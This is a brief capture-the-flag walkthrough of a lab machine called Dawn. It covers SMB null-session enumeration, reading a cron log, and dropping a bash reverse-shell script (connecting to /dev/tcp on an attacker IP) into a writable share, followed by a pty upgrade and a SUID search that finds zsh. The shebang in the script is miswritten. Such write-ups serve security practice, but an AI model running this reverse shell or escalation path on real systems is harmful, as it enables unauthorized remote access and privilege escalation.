🐧Dawn

192.168.234.11

Enumeration

Port 80

Dirbuster results

Grabbed management.log file.

Now we now at least two users names dawn and ganimedes. This looks like a cron job running every minute in the log.

Port 139/445

Check SMB ports for null session login.

smbclient -L  \\\\192.168.234.11\\ -N

ITDEPT folder empty.

We do have read/write permissions for it though.

Port 3306

No information gathered about this port.

Shell

Looked for a hint here because my Meterpreter binary kept getting an error and the session would close immediately. I found that it is because I am an idiot and did not set the multi/handler to accept the payload type I was using when I made the binary.

Looked at a write up when my binary was not working and found that a simple reverse shell was being used. Easy enough. Made product-control and dropped it in ITDEPT.

!#/bin/sh
bash -c 'exec bash -i &>/dev/tcp/192.168.49.234/9966 <&1'

Get a decent shell.

python -c 'import pty; pty.spawn("/bin/bash")'

Root

Found that zsh was stickied.

find / -perm -u=s -type f 2>/dev/null

Last updated

Was this helpful?